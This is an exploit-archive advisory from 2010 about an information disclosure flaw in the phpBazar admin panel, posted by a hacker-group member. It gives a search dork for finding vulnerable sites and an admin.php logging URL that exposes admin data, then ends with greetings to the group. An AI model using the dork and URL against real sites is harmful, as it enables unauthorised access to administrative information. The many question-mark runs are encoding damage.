[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : phpBazar admin Information Disclosure Vulnerability
# Published : 2010-07-22
# Author : Net_Spy
# Previous Title : WordPress Plugin myLDlinker SQL Injection Vulnerability
# Next Title : Free PHP photo gallery script Remote Command Execution Vulnerability
=====================================
phpBazar admin information discloser Vulnerability
=====================================
Author???????????????? :: Net_Spy
Group????????????????? :: Aras cyber Army
Email????????????????? :: tvc82_2002@yahoo.com
Discover?????????????? :: 1 july 2010
Critical Lvl?????????? :: M
Published????????????? :: 22 july 2010
Vendor???????????????? :: http://www.smartisoft.com/
---------------------------------------------------------------------------
~~~~~~~~~
Dork?????????????????? :: intitle: phpBazar-AdminPanel
~~~~~~~~~~~~~~~~~~
demo?????????????????? :: http://www.target.com/admin/admin.php?action=logging&orders=userid&sort=asc&offset=0&poffset=0
??????????????????????? ?
~~~~~~~~~~~~~~~~~~~~~~~~~
Example Just For Edu?? :: http://www.site.com/admin/admin.php?action=logging&orders=userid&sort=asc&offset=0&poffset=0
??????????? ?
???????????? ?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+++++++++++++++++++++++++++++++++++++++
[!] greetiz to ::
??? DrgPxX,D3stan,hackfaz,hamed.err000r,Net_Spy,jawadn
??? All aras cyber amry members
? ?
+++++++++++++++++++++++++++++++++++++++